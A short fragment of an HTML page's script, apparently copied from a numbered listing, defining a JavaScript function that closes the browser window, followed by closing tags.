function closewindow()
{
    self.close();
}
  1687. </script>
  1688. </body>
  1689. </html>